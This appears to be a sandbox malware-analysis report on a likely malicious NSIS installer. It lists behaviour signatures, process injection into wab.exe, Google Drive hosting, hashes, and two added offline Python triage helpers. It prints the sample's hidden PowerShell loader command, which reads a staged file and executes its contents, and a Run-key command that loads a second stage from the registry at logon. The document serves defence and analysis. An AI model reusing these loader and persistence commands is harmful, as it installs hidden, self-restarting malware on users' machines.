Analysis Overview
SHA256
4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7
Threat Level: Likely malicious
The file batterie daahindenes.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Active Setup
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
NSIS installer
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Runs regedit.exe
Modifies registry key
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-09 08:05
Signatures
NSIS installer
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-09 08:05
Reported
2024-07-09 08:15
Platform
win7-20240705-en
Max time kernel
597s
Max time network
493s
Command Line
Signatures
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ortyginae = "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\\Audiometeret\\').Rudolph;%Monopolizables% ($masturbated)" | C:\Windows\SysWOW64\reg.exe | N/A |
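The Run value above is the persistence link worth understanding before hunting for it: it is written as REG_EXPAND_SZ, so the stored string never names powershell.exe; %Monopolizables% is expanded at logon, and the actual second stage is not in the Run key at all but is read back from HKCU:\Audiometeret\Rudolph. The report shows no write to HKCU\Environment, so where Monopolizables is defined is not on this page. The following Python is an added offline triage helper (not code from the sandbox or from the sample) that parses the reg.exe command line from the Processes list and then checks, against a constructed snapshot of a host's HKCU\Environment and the named HKCU values, whether the chain would actually fire. The sample host state and the assumption that Monopolizables points at powershell.exe (inferred from the -windowstyle switch) are labelled as such in the code.

```python
import re

# Constructed from the reg.exe command line in the Processes list
# (REG ADD ... /v "Ortyginae" /t REG_EXPAND_SZ /d "..."), copied as text.
# Nothing in this script touches a live registry.
REG_ADD_CMDLINE = (
    'REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f '
    '/v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized '
    "$masturbated=(Get-ItemProperty -Path 'HKCU:\\Audiometeret\\').Rudolph;"
    '%Monopolizables% ($masturbated)"'
)

REG_ADD = re.compile(
    r'REG\s+ADD\s+(?P<key>\S+).*?/v\s+"?(?P<name>[^"\s]+)"?'
    r'.*?/t\s+(?P<type>\S+).*?/d\s+"(?P<data>.*)"\s*$',
    re.IGNORECASE,
)
ENV_REF = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
# (Get-ItemProperty -Path '<key>').<value>  is where the second stage is read from
ITEMPROP = re.compile(
    r"Get-ItemProperty\s+-Path\s+'([^']+)'\s*\)\s*\.\s*([A-Za-z_][A-Za-z0-9_]*)",
    re.IGNORECASE,
)


def parse_reg_add(cmdline):
    """Split a REG ADD command line into key, value name, value type and data."""
    m = REG_ADD.search(cmdline)
    if not m:
        raise ValueError("not a REG ADD ... /v ... /t ... /d ... command line")
    return m.groupdict()


def parse_run_value(data):
    """Pull the moving parts out of Run-value data of this shape: the %VAR%
    references that stand in for the interpreter path (expanded at logon
    because the type is REG_EXPAND_SZ, so the stored string never names
    powershell.exe) and the registry value the second stage is read from."""
    return {
        "env_refs": sorted(set(ENV_REF.findall(data))),
        "second_stage": [
            {"key": key.rstrip("\\"), "value_name": name}
            for key, name in ITEMPROP.findall(data)
        ],
        "hidden_window": "-windowstyle" in data.lower(),
    }


def chain_status(parsed, user_env, hkcu_values):
    """Compare the parsed Run value with what a responder pulled from a host.
    user_env    - HKCU\\Environment as {name: value}
    hkcu_values - {(key, value_name): data} for the values the entry reads
    The entry only fires if every %VAR% expands and the second stage exists."""
    interpreter = {var: user_env.get(var) for var in parsed["env_refs"]}
    stage_present = all(
        (s["key"], s["value_name"]) in hkcu_values for s in parsed["second_stage"]
    )
    return {
        "interpreter": interpreter,
        "second_stage_present": stage_present,
        "armed": all(interpreter.values()) and stage_present,
    }


# Constructed host state for the demo. Assumption: the report shows no write
# to HKCU\Environment, so where %Monopolizables% is defined (and that it
# points at powershell.exe) is inferred from the -windowstyle switch, not
# taken from the page.
SAMPLE_USER_ENV = {
    "Monopolizables": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
}
SAMPLE_HKCU = {("HKCU:\\Audiometeret", "Rudolph"): "<second-stage script, not on the page>"}

if __name__ == "__main__":
    entry = parse_reg_add(REG_ADD_CMDLINE)
    parsed = parse_run_value(entry["data"])
    print(entry["name"], entry["type"], parsed)
    print(chain_status(parsed, SAMPLE_USER_ENV, SAMPLE_HKCU))
    print(chain_status(parsed, {}, SAMPLE_HKCU))  # env var absent: not armed
```

On a real host the two inputs to chain_status come from HKCU\Environment and from the keys the parsed value names; collecting all three locations (the Run value, the environment variable, the HKCU:\Audiometeret key) is what makes the persistence removable, since deleting only the Run value leaves the staged script in place.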
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2432 set thread context of 2008 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\batterie daahindenes.exe
"C:\Users\Admin\AppData\Local\Temp\batterie daahindenes.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x598
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "1096" "880"
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "3032" "880"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
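The powershell.exe command line in the process list is the first stage of the chain: it reads Reexpression.Tid with Get-Content, takes three characters at offset 70479 as a command name, and invokes that name with the dot operator on the whole file content. Loaders of this shape typically carve an alias such as iex, so the entire file is handed to Invoke-Expression, but the file's bytes are not on this page, so the verb is not confirmed here. The Python below is an added offline helper (not code from the sandbox or the sample) that recovers the path and offset from the command line and carves the verb out of a file body without executing anything; the stand-in file body and the assumption that the verb is iex are constructed and labelled in the code.

```python
import re

# Constructed copy of the powershell.exe command line from the Processes list.
# The file it names (Reexpression.Tid) is not on the page; a stand-in body is
# built further down and labelled as such.
LOADER_CMDLINE = (
    '"powershell.exe" -windowstyle hidden "$Vangede=Get-Content '
    "'C:\\Users\\Admin\\AppData\\Roaming\\annekskirkers\\dommedagens\\nonmenial\\Reexpression.Tid';"
    '$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"'
)

LOADER = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'.*?\.SubString\((?P<offset>\d+),\s*(?P<length>\d+)\)",
    re.IGNORECASE,
)

# Aliases that, invoked with the dot operator, execute the string they are
# given. Only the well-known pair is listed.
STRING_EXECUTORS = {"iex": "Invoke-Expression", "icm": "Invoke-Command"}


def parse_loader(cmdline):
    """Recover the script path and the (offset, length) of the command name
    the loader carves out of that file and then invokes on the whole file."""
    m = LOADER.search(cmdline)
    if not m:
        raise ValueError("command line does not match the Get-Content/SubString loader shape")
    return {"path": m["path"], "offset": int(m["offset"]), "length": int(m["length"])}


def carve_verb(script_text, offset, length):
    """Return the characters the loader would use as a command name, without
    running anything. Get-Content without -Raw yields one string per line, so
    the .SubString call only addresses one string if the file is a single
    line; refuse anything else rather than guess. Indexing matches PowerShell
    for single-byte content (an ASCII or ANSI file, the usual case)."""
    lines = script_text.splitlines()
    if len(lines) != 1:
        raise ValueError(f"expected a single-line script, got {len(lines)} lines")
    line = lines[0]
    if offset + length > len(line):
        raise ValueError("offset runs past the end of the file")
    return line[offset:offset + length]


def resolve_verb(verb):
    """Map a carved alias to the cmdlet it stands for, or None if unknown."""
    return STRING_EXECUTORS.get(verb.lower())


# Constructed stand-in for Reexpression.Tid: the real bytes are not on the page.
# Assumptions: the file is one line of PowerShell and the carved verb is iex,
# so the whole file is handed to Invoke-Expression. The filler variable puts
# the verb exactly at the offset the command line names.
_PREFIX = "$p = '"
SAMPLE_SCRIPT = _PREFIX + "A" * (70479 - len(_PREFIX) - 2) + "';iex ($p)"


def triage(cmdline, script_text):
    """Tie the pieces together for one loader command line and its file."""
    info = parse_loader(cmdline)
    verb = carve_verb(script_text, info["offset"], info["length"])
    return {**info, "verb": verb, "cmdlet": resolve_verb(verb)}


if __name__ == "__main__":
    print(triage(LOADER_CMDLINE, SAMPLE_SCRIPT))
```

Run against the real Reexpression.Tid (hashes listed under Files) this gives the verb without detonating the file; whatever the carved name resolves to, the remainder of the script is then read as ordinary PowerShell source, which is where the staging of the wab.exe injection seen in the SetThreadContext signature would be found.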
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
Files
memory/2432-11-0x0000000073DE1000-0x0000000073DE2000-memory.dmp
memory/2432-12-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/2432-14-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/2432-13-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/2432-15-0x0000000073DE0000-0x000000007438B000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid
| MD5 | d89dac6d6bcfb431c31bdf7d21f48fbd |
| SHA1 | 2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9 |
| SHA256 | ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b |
| SHA512 | 76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070 |
memory/2432-18-0x0000000073DE0000-0x000000007438B000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Boomless.Fag
| MD5 | 1a78d0f226d0db154812e61b8cadb4b8 |
| SHA1 | e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e |
| SHA256 | 19997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e |
| SHA512 | b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41 |
memory/2432-20-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/2432-21-0x00000000067F0000-0x000000000938E000-memory.dmp
memory/2432-22-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/1096-46-0x000000001B7E0000-0x000000001BAC2000-memory.dmp
memory/1096-47-0x0000000001EE0000-0x0000000001EE8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OutofProcReport259902064.txt
| MD5 | 52adb0f7ab38f06d59f3358e8a351803 |
| SHA1 | 5ec15aaa48cbd2a852cbf5c27831bef97e22b11f |
| SHA256 | bb9e8f95f27c2a26414412144046980f618f5b6bbb76dfd6376990429b087bce |
| SHA512 | 0e50950cee99d8676e16021415b8bbf5dc9c29ec622e9b747c479dcad0854948475dd452c588297464d0a16841192e2b4227fc6bcc5c55e59cda716bb2275b49 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 490919770ce4bf4f08ea6e727cd9d569 |
| SHA1 | 7a8b6fe38a3a4f43caa1acc7b12284b79422325f |
| SHA256 | f2da85200b8d5197a93363a1f003b6436ae48fbdcd40bb4a00c49b9af23d4936 |
| SHA512 | abee1c24e472e1d77d37ce344889d3baf790645f15301fbd9518603357ab7fb43d64fc6381c9cbd3fe25da0e4c351fc3a5ecd4a71fe774e80681e0c8687daab0 |
memory/3032-56-0x000000001B550000-0x000000001B832000-memory.dmp
memory/3032-57-0x0000000001DD0000-0x0000000001DD8000-memory.dmp
C:\Users\Admin\explorer.exe
| MD5 | ac4c51eb24aa95b77f705ab159189e24 |
| SHA1 | 4583daf9442880204730fb2c8a060430640494b1 |
| SHA256 | 6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a |
| SHA512 | 011bfe19bd15dcc0f9850575e20d7f2c01160ec98ba461ad59a51b9417049e6475648b9056990247699624b080cf609ec7b5409231cfb46a012d723f7db08d81 |
C:\Users\Admin\AppData\Local\Temp\OutofProcReport259948958.txt
| MD5 | 7f2449903a1c386d4d33278b8c03da5e |
| SHA1 | 6e103c0d1d028398d18470019f2f3c601f38cd26 |
| SHA256 | 565ee83bc2fd2271c034e558b6b64d646157b67920da2cb2cfa2f984a19700ae |
| SHA512 | 15e6cc8dc8e7743df55ae8d7dbaa72f48cd26aab4f479f3b3389fe50508a36b3213a4d77e878473fd30fb967e9265550b1fc95d00c2d548646750b6de8653314 |
memory/2580-63-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2580-64-0x0000000140000000-0x00000001405E8000-memory.dmp